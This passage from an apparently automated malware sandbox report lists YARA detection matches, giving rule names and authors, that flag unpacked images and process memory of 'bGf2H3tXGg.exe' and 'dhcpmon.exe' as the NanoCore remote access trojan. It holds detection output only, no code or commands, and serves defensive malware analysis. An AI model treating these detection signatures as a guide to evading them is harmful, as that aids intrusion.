        Source: Yara match | File source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2881458.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2870000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.3563214.6.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.525980.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.23b0000.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.400000.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35e783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.21d0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.673878.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.356783d.7.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.355e3de.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.1.dhcpmon.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3495530.7.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.35e3214.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.5c6ad8.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.1.dhcpmon.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.673878.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.3470831.12.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3513214.8.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.346c208.11.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.525980.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.346c208.11.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.3513214.8.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.872728.2.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.4a60000.10.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.400000.1.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29b0000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.2.bGf2H3tXGg.exe.872728.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.415058.0.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 15.2.dhcpmon.exe.2881458.4.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 14.1.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.5c6ad8.2.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 11.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 22.2.dhcpmon.exe.23b0000.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 0.2.bGf2H3tXGg.exe.29c1458.3.raw.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 17.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPE
        Source: Yara match | File source: 3.2.bGf2H3tXGg.exe.415058.0.unpack, type: UNPACKEDPE

        System Summary:

        Malicious sample detected (through community Yara rule)
        Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.494409950.0000000004E72000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.318797223.00000000034E1000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000001.247277523.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.317545365.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.488378947.00000000021D0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000001.319250838.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.493792875.00000000036D7000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.323934536.0000000003561000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000001.300644075.0000000000414000.00000040.00020000.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.326163063.0000000004A62000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.338981000.00000000023B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.339113549.0000000002432000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339334436.00000000034CC000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000F.00000002.324052877.0000000002870000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339271124.00000000024E0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.489075151.000000000243C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323984965.000000000359C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.319988300.0000000004A82000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.339302702.0000000003491000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.323578165.00000000024C0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000B.00000002.306005261.00000000029B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.322836165.000000000050C000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.338373270.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.318495205.0000000000859000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.485375087.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000000.00000002.255989903.00000000029B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.323888903.00000000025B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318765961.0000000002530000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000E.00000002.319780906.0000000004960000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 0000000C.00000002.311997780.00000000028B0000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000016.00000002.338595453.00000000005A8000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000003.00000002.486901430.0000000000658000.00000004.00000020.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 00000011.00000002.322659318.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 0000000E.00000002.318855204.000000000351C000.00000004.00000001.sdmp, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 4656, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6468, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 6704, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: bGf2H3tXGg.exe PID: 204, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6212, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6816, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6600, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: Process Memory Space: dhcpmon.exe PID: 6752, type: MEMORY | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.24bcc88.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29c1458.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.1.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.3565530.6.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.373c0d6.13.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.4e70000.16.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.4960000.9.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.2457edc.5.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.35de3de.9.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.37332a7.15.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.2430000.4.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28b0000.4.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.374a506.14.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 15.2.dhcpmon.exe.2870000.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.1.dhcpmon.exe.400000.0.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.3495530.7.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.24c0000.3.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.340c550.8.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.254b998.4.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 11.2.bGf2H3tXGg.exe.29b0000.4.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.3565530.6.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.35e3214.8.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.350e3de.10.raw.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 3.2.bGf2H3tXGg.exe.21d0000.3.unpack, type: UNPACKEDPE | Matched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.3563214.6.unpack, type: UNPACKEDPE | Matched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28c1458.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.351783d.9.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.1.bGf2H3tXGg.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.415058.1.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.4a80000.10.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28b0000.4.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.34e5530.5.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 12.2.dhcpmon.exe.28c1458.3.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 14.2.bGf2H3tXGg.exe.415058.1.raw.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 22.2.dhcpmon.exe.415058.0.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
        Source: 17.2.dhcpmon.exe.24c0000.3.unpack, type: UNPACKEDPEMatched rule: NanoCore Author: Kevin Breen <kevin@techanarchy.net>
        Source: 22.2.dhcpmon.exe.400000.1.unpack, type: UNPACKEDPEMatched rule: Detetcs the Nanocore RAT Author: Florian Roth
